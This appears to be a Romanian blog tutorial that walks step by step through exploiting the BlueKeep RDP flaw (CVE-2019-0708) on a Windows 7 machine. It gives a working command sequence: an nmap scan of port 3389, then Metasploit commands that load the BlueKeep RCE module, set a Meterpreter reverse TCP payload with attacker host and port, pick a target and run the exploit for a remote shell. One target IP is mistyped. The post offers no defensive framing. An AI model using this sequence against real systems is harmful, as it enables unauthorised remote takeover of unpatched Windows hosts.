BlueKeep – Exploatează Windows (Vulnerabilitatea RDP) de la distanță

Protocolul de desktop la distanță (RDP) este un protocol de comunicații de rețea securizat, conceput pentru gestionarea de la distanță, precum și pentru accesul de la distanță la desktop-uri virtuale, aplicații și un server terminal RDP.

RDP permite administratorilor de rețea să diagnosticheze și să rezolve de la distanță problemele pe care le întâmpină abonații individuali. RDP este disponibil pentru majoritatea versiunilor sistemului de operare Windows. RDP pentru Apple macOS este, de asemenea, o opțiune. De asemenea, este disponibilă și o versiune open source.

Dar RDP are o vulnerabilitate pe Windows7, așa că astăzi vom face o demonstrație în acest sens. Așa că haideți să deschidem un prompt de comandă și să începem.

RDP rulează pe portul 3389 TCP, așa că mai întâi va trebui să vedem dacă dispozitivul pe care îl atacăm folosește acest protocol. Pentru aceasta vom folosi nmap și vom specifica portul 3389 în scanarea noastră. Tot ce vom avea nevoie este IP-ul mașinii Windows7. Al nostru, în acest caz, este 192.168.100.84.

nmap -sV -p 3389 192.168.100.84

Comanda de mai sus va scana, căutând în mod special să vadă dacă portul 3389 este utilizat, putem vedea că steagul -p denumește portul. Așadar, să vedem rezultatele scanării.

bk1.PNG

După cum putem vedea, cutia noastră Windows7 folosește într-adevăr portul 3389. Acum să trecem la exploit. În primul rând, va trebui să deschidem Metasploit.

msfconsole

În continuare vom căuta exploit-ul pe care îl căutăm, în cazul nostru, Bluekeep.

search bluekeep

bk2.PNG

Așa că aici putem vedea două exploit-uri, ambele pentru Bluekeep, dar noi vom avea nevoie doar de cel de jos. Așa că haideți să o folosim pe aceea.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

bk3

După ce putem vedea exploit-ul în roșu, știm că acum îl folosim. Așa că haideți să căutăm mai multe informații despre acest exploit.

info

bk4

Așa că ne oferă o explicație cu privire la modul în care acest exploit este capabil să gestioneze în mod necorespunzător bindurile pentru a obține executarea de cod. Perfect. În continuare, va trebui să îi spunem lui Metasploit IP-ul mașinii țintă Windows7.

set RHOSTS 109.168.100.84

bk5.PNG

După ce este configurat, putem merge mai departe și să-i dăm sarcina utilă pe care dorim să o folosim, împreună cu exploit-ul, pentru a obține un shell TCP inversat.

set payload windows/x64/meterpreter/reverse_tcp

Așa că specificăm sistemul de operare Windows, arhitectura de 64 de biți și cerem un shell TCP inversat cu o sesiune Meterpreter. Alte câteva lucruri pe care trebuie să le facem este să îi dăm lui Metasploit IP-ul mașinii noastre de atac și numărul portului pe care să asculte.

set LHOST 192.168.100.237set LPORT 4444

bk7

Specificăm portul 4444 pentru a asculta pur și simplu pentru că știm că nu există niciun alt serviciu care rulează pe acel port. Așa că acum vrem să vedem ce opțiune de țintă ne oferă Metasploit.

show targets

bk8

Știm deja din scanarea noastră nmap de mai devreme că boxa Windows7 rulează pe VMWare, Virtualbox mai exact, așa că vom alege numărul 2 din listă.

set target 2

bk9

Dacă aveți toate acestea configurate, pasul final este să exploatați mașina țintă.

exploit

bk10.PNG

Vezi că exploit-ul încearcă să funcționeze. Putem vedea, de asemenea, că ne spune că ținta este vulnerabilă. Acest exploit ar trebui să dureze doar un minut pentru ca codul să se execute.

bk11

BOOM!!! avem un shell Meterpreter de pe mașina țintă!!! Iată cum funcționează Bluekeep.

Mulțumim pentru lectură, băieți, vă rugăm să reveniți pentru mai multe postări de acest gen și să ne dați sugestii despre ce ați dori să publicăm.

De asemenea, nu uitați să vă abonați, să distribuiți și să dați like, vă mulțumim anticipat!!!

.

Lasă un răspuns

Adresa ta de email nu va fi publicată.